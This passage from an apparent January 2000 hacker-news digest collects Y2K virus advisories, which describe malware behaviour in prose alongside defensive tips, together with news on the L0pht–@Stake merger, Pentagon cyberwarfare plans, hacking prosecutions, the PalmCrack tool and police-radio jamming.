Trojan.KillInst98, Inst98, Trojan/Kill_Inst98) -- a DOS Trojan is a compressed file that upon execution if certain conditions are met will delete all files in the c:\ directory. When the Trojan is run it executes a command that turns off the confirmation and the output is not seen by the user. As a result, the user is not able to notice that the files have been deleted. -- PE_CRYPTO -- a memory resident PE-file infector that tries to hide its presence by using an encryption mechanism. This virus also deletes antivirus related files to avoid detection. Upon execution, PE_CRYPTO drops kernel32.dll and wininit.ini files. Upon boot up, the original kernel32.dll is replaced by the one dropped by the virus. After that the virus tries to infect others files, also adding encryption to all newly infected files. Since the dll file is loaded upon restart, the virus becomes memory resident and is executed each time the computer is rebooted. -- VBS_BUBBLEBOY (a.k.a. BUBBLEBOY WORM) -- attained much notoriety in the press because it is the first virus discovered that doesn't require the user to click on an attachment in order to activate. BubbleBoy arrives in an email with a Subject line that reads "BubbleBoy is back!" The message contains an invalid URL ending in "bblboy.htm" and the message text "The BubbleBoy Incident, pictures and sounds." When executed, the worm will try to email itself to every contact in the user's address book. It also goes into the registry and changes the system's registered owner to "BubbleBoy" and the organization to "Vandelay Industries." -0- Y2K viruses discovered from December 31 to January 2 include: -- TROJ_ZELU -- a trojan pretending to be a Y2K checking software (Y2K.EXE), TROJ_ZELU that in fact, does not fix any Y2K bugs. Instead, it goes through all drives and deletes files. As it does so, it displays the following text: "This file is sick ! It was contaminated by the radiation liberated by the explosion of the atomic bomb." TROJ_ZELU does not infect other files and it does not reside in memory. This trojan is not in the wild at present and has not been spotted at any customer sites. -- W97M_VALE.A -- a macro virus that can infect all Windows platforms. This virus does not have a dangerous payload and is currently not in the wild. Once a system is infected, W97M_VALE.A uses IRC servers to send an infected file to chat users. This virus also has various trigger dates (May 19, Sept. 20, Dec. 25, Jan. 1) and displays different messages on different dates. It also hooks various macro functions to drop files called MONEY.DOC and DINHEIRO.DOC to the c:\Windows directory, displays messages in the Office Assistant, and modifies the registry to reduce Office 2000's security level. The virus author intended to have W97M_VALE.A spread via Outlook, but this payload does not work. -- W97M_Chantal.B -- (described above) -- VBS_LUCKY2000 -- (described above) Monday morning steps to take to minimize risk of infection: Trend Micro urges all computer users to take the following precautionary measures when booting up their computers on Monday morning to minimize risk of virus infection. -0- -- Update virus protection software -- Before opening any documents or checking email, users should be sure to update their virus protection software to ensure protection against viruses discovered during the Y2K rollover. Trend Micro customers should update to Pattern File 637, which includes protection against all of the 14 new viruses. -- Avoid opening any suspicious or unexpected email attachments -- Don't take unnecessary chances by opening email attachments sent by individuals you don't know, or by opening email attachments from users you do know that you were not expecting. If you have a suspicious file or think you might have a virus, email it to virus_doctor@trendmicro.com for our team of virus doctors to review. This is a free service provided by Trend Micro. -- Save all email attachments to a local drive before opening -- Desktop virus protection does not scan email attachments if they aren't first saved to a local drive. Ensure all email attachments are scanned by virus protection software by saving them to local drive before opening them. -- Use free online virus scanners -- If you haven't invested in desktop virus protection, use a free online virus scanner, like Trend Micro's HouseCall at http://housecall.antivirus.com, to scan and rid your computer of viruses. Remember, online scanners can't protect you from viruses lurking in unopened email attachments. They can only scan files already on your system. If you are relying on an online scanner, save all email attachments to a local drive before opening them and then use HouseCall to scan them all at once. -- Set Browser and Windows Security Settings to Medium or High -- This will prevent certain script viruses from automatically executing. To set security to high, go to Tools/ Internet Options. Click the security tab and select high security. Trend also strongly advises that users get the latest security patches from Microsoft. Users with Microsoft's Internet Explorer 5.0 can go to Tools/ Windows Update to get the latest patches and plug-ins. More information about all of these viruses and worms can be obtained from Trend Micro's special Y2K Virus Watch site, http://www.y2kvirus.com. About Trend Micro Trend Micro provides centrally controlled server-based virus protection and content-filtering products and services. By protecting information that flows through Internet gateways, email servers, and file servers, Trend Micro allows companies and managed service providers worldwide to stop viruses and other malicious code from a central point before they ever reach the desktop. Trend Micro's corporate headquarters is located in Tokyo, Japan, with business units in North and South America, Europe, Asia, and Australia. Trend Micro's North American headquarters is located in Cupertino, CA. Trend Micro's products are sold directly and through a network of corporate, value-added resellers and managed service providers. Evaluation copies of all of Trend Micro's products may be downloaded from its awarding winning web site, http://www.antivirus.com. Note to Editors: eDoctor and HouseCall are trademarks of Trend Micro Incorporated. Other product and company names may be trademarks of their respective owners. Contact: Trend Micro Inc. Susan Orbuch, 408/257-1500 Ext. 6362 susan_orbuch@trendmicro.com or Asia: Kristin Zoega, +886-2-2378-9666 Ext. 418 kristin_zoega@trend.com.tw or Europe: Donna Rennemo, +47 22 86 24 43 donna_rennemo@trendmicro.com -=- Australian Financial Review; New computer viruses crop up with year 2000 Several new computer viruses appeared during the last days of 1999 and the first weekend of 2000, anti-virus software makers said today. The software maker Trend Micro detected 14 viruses, four of which were triggered with the passage to the year 2000 (Y2K) or post messages tied to this changeover. Six of the viruses were discovered by business clients in North America, the firm said. The viruses pose no serious threat for the moment, Trend Micro said, adding however that some 4,000 computer systems have been affected worldwide in the past seven days. Jeffrey Carpenter, from Computer Emergency Response Team's virus surveillance centre at Carnegie Mellon University, said the volume of viral incidents tied to Y2K have been near that found on an average day - 30. Among the new viruses, "Feliz.Trojan" from Portugal can destroy several operating files on a computer hard drive, leaving the machine inoperable. However, unlike other viruses, this one cannot multiply, software maker Computer Associates said. Once the files are destroyed, an image pops on the screen with the message "Feliz ano novo" or "Happy New Year" in Portuguese. When the computer user clicks on the "exit" icon, a series of messages appear in Portuguese and the command is executed, leaving the computer unable to boot up again, Computer Associates, which makes an anti-virus program, said. Another virus, Troj.Zelu, claims to fix Y2K problems but can actually destroy all files on an infected machine, the firm said. And Lucky2000 virus replaces all the files with its own code and carries a link to a Web site in Russia. Trend Micro said the Chantal.B virus, which is activated the 31st day of every month, also can destroy all hard drive files. It posts the message "Y2K is coming soon ..." Other viruses are spreading by the traditional e-mail path. In Finland, mobile phone giant Nokia said it closed its internal e-mail system to prevent further damage from the "ExploreZip worm virus" which had infected computer systems of several large international companies, the Helsinki business paper Taloussanomat reported Monday. A spokeswoman said they believe the virus caused little damage. It entered their systems on Wednesday and was stopped on Thursday. Another e-mail virus, "Armagidon," will replace the computer's cursor with another symbol. AFP Excite News; Network Associates Recommends Continued Caution as Corporations Return to Work After Quiet Y2K Weekend Continued Vigilance Necessary Even After Uneventful New Year's Holiday As Potential Viruses May Be Lurking in Email for Returning Employees Updated 6:00 AM ET January 3, 2000 SANTA CLARA, Calif., Jan. 3 /PRNewswire/ -- Network Associates, Inc. (NASDAQ:NETA) today reminded companies and consumers of the need for continuing "safe computing" practices as they return to work after the New Year's holiday. Recognizing that the limited virus threat throughout the holiday may result in a feeling of false security, Network Associates reminds IT Managers that the potential for damage from new viruses or security holes still exists. Network Associates' McAfee AVERT (Anti-Virus Emergency Response Team) will remain in high alert posture for the next 72 hours, as the majority of computers worldwide are powered up for the first time this millennium on the morning of January 3. "We are pleased that the New Year's holiday did not pose any strong threats to our customers, as the potential for Y2K damage was very real," said Sal Viveros, director for McAfee Total Virus Defense at Network Associates. "However it is essential for corporations to stay on top of virus happenings and be especially alert this week as computers are re-booted, and email between users and the outside world begins to flow freely again." "Melissa was one of the most destructive viruses of 1999. This virus spread at lightening speed through email attachments. It was discovered on a Friday morning, and had spread world-wide within six hours," said Jimmy Kuo, director of AVERT anti-virus research. "Because these viruses can strike at any time, and the threat continues, this week AVERT will staff the CyberAssurance National Information Center, which is part of the President's Council on the Year 2000 Conversion Information Coordination Center." From December 30 through the turnover to the new year, McAfee AVERT researchers found seven low-risk viruses, which represents the average amount of virus writing activity AVERT usually experiences during a four-day timeframe. There has been no indication that these seven viruses are actively spreading in customer sites at this time. Nevertheless, AVERT's worldwide research and support team will continue to monitor for the spread of these viruses as well as any new viruses released during the New Year. For details on the seven new viruses as well as continued updated information on newly discovered Y2K viruses, visit the AVERT Web site at: http://vil.nai.com/villib/alpha.asp. Network Associates is recommending continued caution during the week of January 3, 2000, suggesting that users adhere to the following guidelines to protect against viruses. 1. Be wary of emails from unfamiliar senders. 2. Don't double-click on email attachments -- save and scan them first 3. Keep software updated. 4. Turn on Macro Virus Protection. 5. Be cautious with free downloads. 6. Guard your personal and financial information. 7. Protect your personal computer. 8. Protect your passwords. 9. Teach children online safety tips. 10. Protect online transactions by using a secure browser. 11. Bonus tip: Be careful -- but don't believe everything you hear. The McAfee Total Virus Defense suite provides comprehensive anti-virus protection at the desktop, file server, groupware server and Internet gateway. Powerful integrated management tools make it easy for administrators to deploy updates and upgrades, and to configure and monitor virus security enterprise- wide. The McAfee Total Virus Defense product line is sold as a standalone suite and as part of the Net Tools Secure suite, Network Associates' comprehensive security suite incorporating anti-virus, firewall, encryption, authentication, intrusion detection, vulnerability assessment, and security management. Network Associates' McAfee AVERT (Anti-Virus Emergency Response Team), a division of NAI Labs, is the largest network of virus researchers in the industry. During the week of January 3, AVERT will continue to work 24X7 around the globe to provide the latest in virus research and anti-virus solutions. With headquarters in Santa Clara, Calif., Network Associates, Inc. is a leading supplier of enterprise network security and management software. Network Associates' Net Tools Secure and Net Tools Manager offer best-of- breed, suite-based network security and management solutions. Net Tools Secure and Net Tools Manager suites combine to create the Net Tools solution, which centralizes these point solutions within an easy-to-use, integrated systems management environment. For more information, Network Associates can be reached at 972-308-9960 or on the Internet at http://www.nai.com. NOTE: Network Associates, McAfee, Total Virus Defense, VirusScan and Net Tools are registered trademarks of Network Associates, Inc. and/or its affiliates in the United States and/or other countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners. @HWA 63.0 L0pht Merges With @Stake, Receives Funding 01/06/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Mudge The renowned hacker think tank L0pht Heavy Industries has merged with the newly formed internet security services company @Stake, Inc. @Stake has assembled a diverse team of extreme talent from premier organizations including Forrester Research, the L0pht, Cambridge Technology Partners, and Compaq Computer. Mudge, from the L0pht, has said that @Stake's vendor neutrality, combined with open lines of communication allows the L0pht to remain true to their roots which is focused on security research and execution which shatters industry myths and builds a totally new standard. @Stake executives will be participating in the major security trade show, RSA 2000, scheduled for January 16-20 in San Jose. Press Release http://www.hackernews.com/press/l0phtmerg.html @Stake Inc. Http://www.atstake.com L0pht Heavy Industries http://www.l0pht.com/ Boston Globe http://www.boston.com/dailyglobe2/006/business/Computer_security_firm_born_from_alliance+.shtml Associated Press - via San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/61092l.htm Reuters - via Excite http://news.excite.com/news/r/000106/00/net-atstake-security MSNBC http://www.msnbc.com/news/353999.asp Press release: Top Executives from Forrester Research, Cambridge Technology Partners, and Compaq Establish @Stake; Specialized Internet Security Services Firm The L0pht, renowned 'hacker think-tank,' to join @Stake Receives $10 million in Initial Backing from Battery Ventures Cambridge, Mass., January 6, 2000 - A group of top Internet executives announced today the establishment of @Stake Inc., a specialized professional services firm that will provide a full range of security solutions for the e-commerce operations of global clients. @Stake represents the industry's only independent security services provider. @Stake also announced that renowned hacker think-tank the L0pht has merged with the newly formed company. This strategic move reflects the firm's commitment to build a world-class team of professionals offering non-traditional, e-commerce-age security solutions for clients. In addition, the company disclosed that it has received over $10 million in initial funding from Battery Ventures, a leading high tech venture capital firm whose other investments include Akamai Technologies, InfoSeek, and Qtera. @Stake is the first company spawned from Battery's newly created in-house incubator program. "@Stake's independence and dedicated focus on Internet security differentiate their approach from other providers," according to Tom Crotty, general partner at Battery Ventures. "They have assembled a diverse team of extreme talent from premier organizations including Forrester Research, the L0pht, Cambridge Technology Partners, and Compaq Computer." The company will offer a full range of security services enabling e-commerce for Global 2000 clients. @Stake will focus on planning next-generation security platforms that achieve long-term e-commerce objectives as well as securing clients' immediate Internet needs. Key to the company's strategic approach is building comprehensive security architectures to minimize the impact of viruses, malicious attacks and other threats while maximizing opportunity and competitiveness for firms engaged in the Internet economy. The company's professional services span infrastructure security, including VPNs and firewalls; content security, such as anti-virus and e-mail scanning; application security, including fine-grained application access control; and operations security, such as intrusion detection and scanning systems. @Stake's management team includes: * Dr. Daniel Geer, Chief Technology Officer, formerly vice president and senior strategist at CertCo and director of engineering at Open Market. His tenure as manager of systems development at MIT's Project Athena led to the creation of, amongst other innovations, the X Window System and Kerberos. * Ted Julian, VP of Marketing and Business Development, formerly lead security analyst at Forrester Research and known for the far-reaching impact of his reports, "Security Suites: Dead on Arrival" and "Turning Security on Its Head." * Mudge, VP of Research and Development, served as CEO/Chief Scientist of hacker think-tank, the L0pht. Having appeared before the Committee on Governmental Affairs of the US Senate to discuss vulnerabilities facing technological resources, Mudge led the L0pht, a group of 'grey-hat hackers' known for unorthodox, extreme technical sophistication. * Dr. Phil Tams, VP of Consulting and Operations, formerly a senior manager at Cambridge Technology Partners and responsible for restructuring IT systems and businesses to compete effectively in the Internet economy. * John J. Rando, Chairman of the Board, was previously senior vice president and group general manager at Compaq. He is widely known for his work developing software product services, pioneering new delivery methodologies, and lifecycle service solutions in networking and systems integration. "@Stake helps clients address the most critical issue facing their e-commerce initiatives: maintaining the highest levels of security while maximizing openness," said Ted Julian, Founder and VP of Marketing and Business Development. "Our strategic approach is based on the premise that true security lies in enabling the entire enterprise, rather than locking down the system with unnecessary complexity and control." "By enabling Internet objectives, our security services unleash enormous benefits for organizations building their e-commerce operations," continued Julian. According to IDC Research, the demand for network security consulting and management services will reach over $1.6 billion in 2002. In addition, in its November 29 brief, "exSourced Security Arrives," Forrester Research "recommends the majority of businesses meet their security needs with exSourcers ... third-party security service providers that connect external constituents with internal processes." "The opportunity to join the first and only independent 'pure play' in the field of Internet security consulting is perfect for the L0pht," according to Mudge, now @Stake's VP of R&D. "@Stake's vendor neutrality, combined with open lines of communication to the full spectrum of people dealing with online security, allows us to remain true to our roots - security research and execution which shatters industry myths and builds a totally new standard." @Stake executives will be participating in the major security trade show, RSA 2000, scheduled for January 16-20 in San Jose. With headquarters in Cambridge, Mass, @Stake is a specialized professional services firm providing security solutions for the e-commerce operations of global clients. More information can be found at www.atstake.com @Stake, Inc. -- Securing the Internet Economy(sm). -=- @HWA 64.0 Offensive Cyberwar Capabilities Taking Shape 01/06/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by betty Air Force Gen. Richard Myers told a Pentagon briefing that he thinks cyberwarfare should take its place along side bombs, cruise missiles and attack helicopters. Myers currently commands Colorado based U.S. Space Command, which is responsible for the cyber defense of DoD systems. Later this year the computer network attack research team will formally take shape at Space Command Headquarters at Peterson Air Force Base. (Space Command? Sounds like something out of a sceince fiction novel.) Reuters - via MSNBC http://www.msnbc.com/news/353982.asp Wired http://www.wired.com/news/politics/0,1283,33443,00.html General Richard B. Myers. U.S. plots cyberwarfare strategy Pentagon officials say they intend to target foes’ computers REUTERS WASHINGTON, Jan. 5 — The Pentagon plans to make cyber blitzes on a foe’s computer networks a standard war tactic, the incoming number two U.S. military officer said Wednesday. AFTER POLICY and legal issues are sorted out, cyber tactics should take their place in every commander’s arsenal alongside bombs, cruise missiles and attack helicopters, Air Force Gen. Richard Myers told a Pentagon briefing. “I think it’s just going to be one more arrow in the quiver,” said Myers, who takes over as vice chairman of the Joint Chiefs of Staff on March 1. The formal establishment of a cyberwar-fighting doctrine will build on covert military and intelligence capabilities that have been scattered in “black” programs in the past. ‘A VERY ELEGANT WAY’ Myers said such “keystroke” attacks would have the advantage of limiting both U.S. casualties and spillover harm to a target nation’s population. “If you can degrade an air defense network of an adversary through manipulating ones and zeros, that might be a very elegant way to do it as opposed to dropping 2,000-pound bombs on radars,” he said. “These are tools that need to go to the operational and tactical levels.” Currently, each of the U.S. armed services has a covert cyber attack capability of its own, said Myers. “I think it’s fair to say that we have done this in the past on a case-by-case basis.” He cited the conflict in Kosovo last year, after which Gen. Henry Shelton, chairman of the Joint Chiefs, said the United States had mounted electronic attacks into Serbian networks during a NATO air campaign. “We worked through some policy and legal issues during Kosovo that will hopefully help us in the future,” Myers said. But he said Serbia offered “limited opportunities” because the Serbs were “not relying on systems that were heavily involved with information technology.” Myers said other countries considered cyber attack as a way of neutralizing nations like the United States which had overwhelming advantages in conventional forces. TEAM TAKING SHAPE The Colorado Springs, Colo.-based U.S. Space Command, which is headed by Myers, assumed responsibility on Oct. 1 for defending Defense Department computer networks from hacker or foreign attack. Next October 1, a companion “computer network attack” research team will formally take shape at Peterson Air Force Base, headquarters of the Space Command. Its first job will be to piece together covertly developed U.S. cyber weapons currently scattered among intelligence and military units. Among the thorny policy issues is the potential blurring of the line between military and civilian targets. Myers cited the case of knocking out a communications network handling civilian applications as well as a nation’s air defense. “I think it’s going to be the legal advisers and the war fighters thinking our way through this,” he said. “And it’s just something we haven’t spent an awful lot of time doing, and we just need to do that.” Critics have warned that the United States is opening a Pandora’s box in moving to integrate “information warfare” tools into military doctrine. “Those same tools would likely be a bigger threat to our systems than to those of any potential opponent,” said Kawika Dagui of the Financial Information Protection Center, a Washington-based industry trade group. -=- Wired; A'Hacking the Military Will Go by Declan McCullagh 12:30 p.m. 5.Jan.2000 PST WASHINGTON -- In a move to enlist hackers as part of the nation's defense, the US military is drafting a plan to penetrate and disrupt the computers of enemy nations, officials said Wednesday. "If you can degrade the air defense network of an adversary through manipulating 1s and 0s, that might be an elegant way to do it," said General Richard Myers of the US Space Command, which is coordinating the effort. Myers told reporters that Pentagon planners are currently devising general hacker-war procedures, which must be approved by the Secretary of Defense and should be complete by October. In October 1999, the Space Command took over the job of protecting Defense Department computers from hacker attacks. But its new roles raise some knotty questions. For instance, should the military be involved in defending vital military communications when they travel over commercial networks? Should online attacks on an enemy's infrastructure be viewed as an act of war, and should such attacks be approved by the president, Congress, or the Pentagon? Myers admitted the answers are still unknown. "A very big part of what we do is to work through the policy and legal parts." One option -- in a kind of unilateral arms-control agreement -- is for the US to pledge not to launch electronic attacks in hopes that international law will follow. It's seems to be what China -- which last year asked the UN General Assembly to investigate the issue -- and Russia both want. But for now, the Pentagon is readying its platoons of hackers. "The services are trying to attract the best and the brightest to come into this area," Myers said. "We think we can do that because we are going to be working on leading-edge technology, we'll give them the right tools, and they'll be doing something for their country." The Pentagon's announcement, which has been quietly discussed for nearly a year, comes at a time when military worries about hackers are at an all-time high. Officials had fretted that attacks would increase on Y2K eve, though government sources say only one minor incident took place. A September 1999 report prepared by congressional auditors claimed there were "serious weaknesses" in the Defense Department's information security. Military networks reportedly experienced over 18,500 intrusions last year, compared to 5,844 in 1998, though some critics have questioned the methodology used to determine those figures. Back in 1997, a war-game exercise named Eligible Receiver reportedly showed that enemy hackers -- in this case, ones playing the part from the National Security Agency -- could bring down 911 phone service and power grids in some cities. The military's NIPRNET (Non-classified Internet Protocol Router Network) carries non-secret information, while the SIPRNET (Secret Internet Protocol Router Network) handles more sensitive data. @HWA 65.0 Army Criticized By Judge On Lack of Security 01/06/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ted U.S. District Judge J.P. Stadtmueller has criticized the U.S. Army's efforts to keep its public Web site secure. The Judge said the Army's effort, or lack of it, could effect the amount of restitution Mindphaser (Chad Davis) is ordered to pay. Mindphaser has pleaded guilty to defacing the server last June 28th. Stadtmueller asked Assistant U.S. Attorney Eric Klumb to get more information on the matter before Mindphaser's scheduled sentencing hearing in March. (Wonder if he will mention that the Army was warned about the problem with their server weeks in advance?) Associated Press - via San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/58972l.htm HNN Archive of US Army Defacement http://www.hackernews.com/defaced/1999/army/index.html Posted at 12:26 p.m. PST Wednesday, January 5, 2000 Judge critical of Army Web site MILWAUKEE (AP) -- A federal judge criticized the U.S. Army's efforts to keep its public World Wide Web site secure after a 20-year-old man said it was easy to hack into it. ``The Army didn't do its homework in the first instance,'' U.S. District Judge J.P. Stadtmueller said Tuesday. The judge commented as Chad D. Davis said pleaded guilty Tuesday to gaining unauthorized access to the site and altering its contents. Davis said he had hacked into the Army computer using information freely available on the Internet. He replaced the Army's opening Web page with the ``signature page'' of Global Hell, a nationwide group of hackers to which he belonged. Stadtmueller said the Army's effort, or lack of it, to keep its Web site secure could affect the amount of restitution Davis is ordered to pay. The judge directed Assistant U.S. Attorney Eric Klumb to get more information on the matter by the time Davis is sentenced in March. Davis exploited a security flaw in a computer program used in building the Web site, according to federal court documents in the case. Klumb said the Army had installed a ``patch'' for the shortcoming before Davis broke in. But there was a period during the summer when the Web site was being moved from one server to another when the patch was not installed on the new server, Klumb said, allowing Davis to break in. Pentagon spokeswoman Nancy Ray said Wednesday that hacking is electronic vandalism. ``It's against the law. That's why the person was in court,'' Ray said. @HWA 66.0 FAA Responds to Allegations 01/06/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Federal Aviation Administration has said that even though they hired foreign nationals to fix their Y2K computer problems that their systems where not compromised as charged by the General Accounting Office. The GAO report released Jan. 4 said that the FAA had not consistently required appropriate background checks on contractor employees who reviewed and fixed air traffic control software for Y2K compliance. The FAA says that although foreign nationals may have been used no back doors where inserted into the code. Federal Computer Week http://www.fcw.com:80/pubs/fcw/2000/0103/web-faa-01-05-00.html (Sorry, page returned a 404 - Ed) @HWA 67.0 Electronic Intruder released with Fine and No Jail 01/06/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Peng Yuan Han, now 18, will not be spending any time in jail for electronically breaking into the computer systems of Singapore's National Computer Board (NCB), Ministry of Education (MOE) and Nanyang Technological University (NTU). Instead he was fined SG$8,000 because he was a teenager when the crimes were committed in 1997. The Straits Times http://straitstimes.asia1.com/cyb/cyb3_0106.html (Sorry, page also returned a 404 - Ed) @HWA 68.0 PalmCrack 1.0 Released 01/06/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by kingpin NonCon, Inc., has release PalmCrack 1.0 which is capable of checking UNIX and NT passwords against a dictionary and decrypt certain Cisco router passwords. The release of this software was delayed until after Jan 1, 2000 in accordance with President Clinton's request Noncon http://www.noncon.org/ Press release: Noncon Releases PalmCrack®, the Password Testing Tool for the Palm Computing Platform® Internet - January 5, 2000 - Noncon has released PalmCrack, the password testing tool for the Palm Computing Platform. Designed to help security professionals determine the strength of passwords, PalmCrack is able to check UNIX and NT passwords against a dictionary and decrypt certain Cisco router passwords. PalmCrack runs on PalmOS 2 and PalmOS 3 devices, including the PalmPilot Professional through the PalmVII and the IBM WorkPad series. It requires 31KB to 1MB of memory depending on the size of the dictionary installed. About Noncon Noncon is a group of rebel non conformists formed in 1982. Their goal is to provide non conforming solutions to the public. For more information, check out the Noncon web site at http://www.noncon.org/. Note: In accordance with President Clinton's request, the release of this tool was delayed until after January 1, 2000. @HWA 69.0 Radio Pirates (criminals) Steal Police Airwaves 01/06/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HWA Comment: These aren't pirates, they are just kids with some radios and no skill being vandals and disrupting emergency services, the type you find buying 2m ht's and spewing QRM over legit ham airwaves, they should be hunted down with RDF gear and have the book thrown at them, there is nothing skillful or 'elite' in disrupting legit radio services! anyone with minimal knowledge can purchase and modify standard 2meter band ham radios to broadcast over emerg. freqs.and some radios have such extended coverage built in, these are just vandals akin to the lewsers that tie up 911 services with bogus calls for kicks, the killer in all this is that these people will most likely be caught as the technology for tracking such abuse is quite sophisticated similar to cell tracking. - Ed (licensed ham operator) From HNN http://www.hackernews.com/ contributed by mphantasm Police departments in San Francisco, Berkeley, Richmond, and Albany have reported intruders on their communications systems. Screaming obscenities and making false emergency calls over reserved police radio frequencies are just some of the issues involved. APB News http://www.apbnews.com/cjprofessionals/behindthebadge/2000/01/05/copradio0105_01.html Radio Pirate Invades Police Frequencies Broadcasts False Reports in San Francisco Area Jan. 5, 2000 By Robert Wang BERKELEY, Calif. (APBnews.com) -- Several police departments in the San Francisco Bay area are searching for a radio-frequency pirate who has invaded the police radio bands, transmitting bogus crime reports and profanity-laced tirades. Another man was arrested in the Los Angeles area last week for a similar offense. Spokesman Tony Parrino said the California Highway Patrol's communications center in Vallejo received eight to 10 transmissions in December on its frequencies from a man posing as a police officer and claiming there was a shooting in progress or a shot officer. "He's quite disruptive, and he has caused our officers and other agency officers to roll Code 3 with red lights and sirens to different locations -- which have turned out not to be true -- at great risk to the public and to our officers and all public-safety officers en route to that location," Parrino said. "He's quite a problem right now." Police departments alerted Police in San Francisco, Berkeley, Richmond, and Albany have reported similar incidents, and all their officers have been alerted about the prankster. The Federal Communications Commission (FCC), which regulates the nation's radio airwaves, said it is investigating but refused to state the status of its probe. In an apparent coincidence, the California Highway Patrol (CHP) in the Los Angeles area said its investigators arrested Jack Gerritsen, 63, of Bell last week for broadcasting recorded profane comments on frequencies used by the CHP and other police agencies in the Los Angeles area as well as a TV station's news unit. The CHP said it knows of no link between the two cases. They have not yet found the man in the Bay area. He appears to be equipped with a programmable radio transceiver and is well-versed in police radio codes. May be disgruntled ex-employee Parrino said the man apparently monitors police transmissions and may be a former government employee. He said CHP dispatchers have often warned him over the air to stop his activities. "This usually sets him off where he starts a list of profanities and starts yelling over the radio," Parrino said. "He starts saying, 'How much time am I going to get in jail? What are they going to do to me?'" The CHP said it is no longer dispatching units in response to the man's calls. Berkeley police said they have had six to eight on-air encounters with the man since early December. Obscenities aimed at dispatchers Berkeley police Lt. Russell Lopes said that on Dec. 28 the radio pirate reported a shooting at a street intersection that does not exist. The dispatcher, realizing it was a hoax, read a lengthy FCC warning telling him to desist. The man replied by yelling over the dispatcher's voice, Lopes said, swearing at the dispatcher and launching into an expletive-filled tirade. The dispatcher then switched police radio traffic to another channel, and the man disappeared. Lopes said they now recognize his voice and no longer send units to respond to his calls. Goes away if ignored "It seems like if he gets on the radio and makes a call and we just ignore him, he kind of goes away," said Lopes, who is not committing much manpower to investigating the case. "We're really not too concerned about it. We're trying to figure out who it is, but it's not a major deal. ... [If] he gets on the radio and he stays on the radio for any length of time, we can go to another channel which he cannot get onto. It's [only] an inconvenience." Lopes said they last heard from the man Sunday night, but he did not have details. The San Francisco police reported that on Thursday, a person transmitted twice within 15 minutes on one of their police frequencies that an officer was in trouble. The dispatch center promptly performed a roll-call check of all officers on duty and found that the call was false, said Rex Martin, the department's director of 911 communications. Martin said the department is not investigating because it was an isolated incident. A threat to public safety In Albany, the police force said the mysterious prankster has aired two bogus incidents on its frequency. Because the dispatcher knows the voices of all 30 officers in the department, the fake calls were recognized immediately, but officers dispatched just in case. Detective James Horn said the man's actions could threaten public safety by interfering with the transmissions of emergency personnel. "If there was an ongoing emergency, he could severely hamper rescue efforts," Horn said. "I hope he's caught. Again, getting on law enforcement channels is dangerous." Police say they have no clue as to the man's motive. 'We should stop this guy' "Maybe he's got something against law enforcement. Maybe he just gets his jollies off doing it," said Horn. Parrino said, "This is wrong, and we should stop this guy, but there's not much that we can do. ... [The] investigators, they have a terrible job trying to find where this guy is." Lopes said he would be difficult to catch. "He could be anywhere in the Bay area," he said. "He could be stationary inside a home. He could be in a car. There's just no way of telling." FCC lends a hand In Southern California, Gerritsen was arrested after the highway patrol enlisted the FCC's help. CHP Sgt. Jeffrey D. Goodwin said Gerritsen recorded obscene comments with a digital recorder that distorted his voice and used a hand-held programmable radio to transmit them over 100 times in a period of three months. Goodwin said CHP investigators during surveillance operations would hear comments like "The CHP are a bunch of [expletive]" on their radios several times during a particular day. "It's annoying. Secondly, it interferes with our operations, and that also bothered me, so that's why our unit investigated this," Goodwin said. Faces only misdemeanor charges Because the transmissions could interfere with a radio distress call by a CHP officer, the agency arranged for the FCC to track the signals with sophisticated equipment and triangulation. Once the FCC pinpointed his location, CHP said its investigators caught Gerritsen in the act of transmitting outside of his coin exchange store in Bell. Because the alleged violations were only misdemeanors, Gerritsen was immediately released and given an order to appear in court this month. He faces a year in jail for each offense. Goodwin said the transmissions have stopped. Gerritsen could not be reached for comment. "Somebody like this should be arrested and put in jail because it affects or could possibly affect the safety of the officers," said Goodwin. "The potential for something serious happening has been averted by his arrest." Robert Wang is an APBnews.com staff writer (robert.wang@apbnews.com). @HWA 70.0 ParseTV has Abruptly Canceled 01/07/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by ewidgb The online television network Pseudo has cancelled its Hack/Phreak streaming TV channel. ParseTV has been closed, effective immediately. We have not received an official reason for the abrupt cancellation. ParseTV made headlines last year when the show's host attempted to perform a hoax on the MTV documentary 'Real Life'. Shamrock, the show's host, was replaced shortly thereafter for unrelated reasons. Reruns will still be available on the site until further notice. ParseTV http://www.parsetv.com Letters from HNN Viewers Regarding the MTV special http://www.hackernews.com/special/1999/mtv/mtv.html Letter from Emmanuel Goldstein regarding the MTV special http://www.hackernews.com/special/1999/mtv/emmanuel.html Letter from Shamrock regarding the MTV special http://www.hackernews.com/special/1999/mtv/shamrock.html @HWA 71.0 Finland Authorities Solve Massive Computer Crime Case 01/07/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by avarr The Finnish police have solved what is thought to be Finland's largest electronic intrusion ever. A young man with the alias TCB had electronically broken into over a hundred computer systems owned by the state, businesses, high schools and others in Finland and abroad during 1997 and 1998. It appears that no damage was caused but the attacker did collect users' log-ins, passwords and emails. The intruder was able to acheive root access in 60% of the systems he broke into . The Finnish Central Criminal Police (KRP) calls this a good lesson in computer security for businesses and communities. Kotimaa - in Finnish only http://ww2.yle.fi/show/YleEsitData?sivu_id=53973&usr_id=0 (Anyone want to translate this?? - Ed) 